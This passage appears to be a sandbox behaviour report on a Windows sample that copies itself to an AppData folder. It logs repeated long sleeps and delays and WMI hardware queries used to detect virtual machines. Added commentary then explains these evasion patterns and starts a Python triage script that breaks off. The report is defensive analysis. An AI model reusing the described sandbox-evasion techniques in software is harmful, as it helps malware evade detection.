              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597478Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597358Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597116Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594452Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598666Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598224Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597966Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597818Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597702Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597415Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597309Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597077Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596166Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596049Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595667Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595438Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595313Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594266Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594155Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594041Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593923Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593811Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599449Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599016Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598907Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598782Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598428Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598018Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597767Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597525Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597417Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596704Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596579Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595708Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595579Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594840Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593990Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593735Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindow / User API: threadDelayed 2432Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWindow / User API: threadDelayed 7339Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 4443Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 5372Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 3881Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWindow / User API: threadDelayed 5830Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599862s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -599031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598921s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598481s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597478s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597358s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597116s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -597000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -595000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594452s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe TID: 6556Thread sleep time: -594343s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 2672Thread sleep count: 4443 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 2672Thread sleep count: 5372 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599218s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598666s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598224s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -598078s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597966s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597818s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597702s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597562s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | TID: 5244 | Thread sleep time (32 calls, each >= -30000s): -597415s, -597309s, -597188s, -597077s, -596953s, -596844s, -596718s, -596609s, -596500s, -596390s, -596281s, -596166s, -596049s, -595922s, -595812s, -595667s, -595547s, -595438s, -595313s, -595188s, -595063s, -594953s, -594844s, -594734s, -594609s, -594500s, -594391s, -594266s, -594155s, -594041s, -593923s, -593811s
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | TID: 1684 | Thread sleep time (53 calls, each >= -30000s): -35971150943733603s, -600000s, -599891s, -599781s, -599672s, -599563s, -599449s, -599344s, -599234s, -599125s, -599016s, -598907s, -598782s, -598672s, -598563s, -598428s, -598157s, -598018s, -597891s, -597767s, -597641s, -597525s, -597417s, -597297s, -597188s, -597063s, -596954s, -596829s, -596704s, -596579s, -596454s, -596329s, -596204s, -596079s, -595954s, -595829s, -595708s, -595579s, -595454s, -595329s, -595204s, -595079s, -594954s, -594840s, -594719s, -594610s, -594485s, -594360s, -594235s, -594110s, -593990s, -593860s, -593735s
Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard (2 occurrences)
Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem (2 occurrences)
Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (22 occurrences)
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (5 occurrences)
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (13 occurrences)
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Last function: Thread delayed
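The sleep, delay and WMI lines above are the raw evidence behind the report's "Contains long sleeps (>= 3 min)" and "Queries sensitive ... information (via WMI ...)" signatures. The following triage script is an added example, not Joe Sandbox code and not part of this report: it parses lines in exactly the fused form the report prints (including the trailing "Jump to behavior" link text), groups them per process and flags three evasion patterns. It assumes the report's raw sleep and delay values are milliseconds (so 600000 is a 10-minute Sleep and 180000 mirrors the 3-minute signature threshold), that 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10000), and it uses its own list of WMI classes commonly queried to fingerprint virtual machines. The countdown check goes beyond the report: it recognises the run of waits that each shrink by roughly 110 ms, the signature of a loop that recomputes remaining = target - elapsed from a wall-clock stopwatch instead of calling Sleep once.

```python
"""Triage 'Thread sleep time', 'Thread delayed' and 'WMI Queries' lines of a
Joe Sandbox behaviour report. Added example, not Joe Sandbox code.
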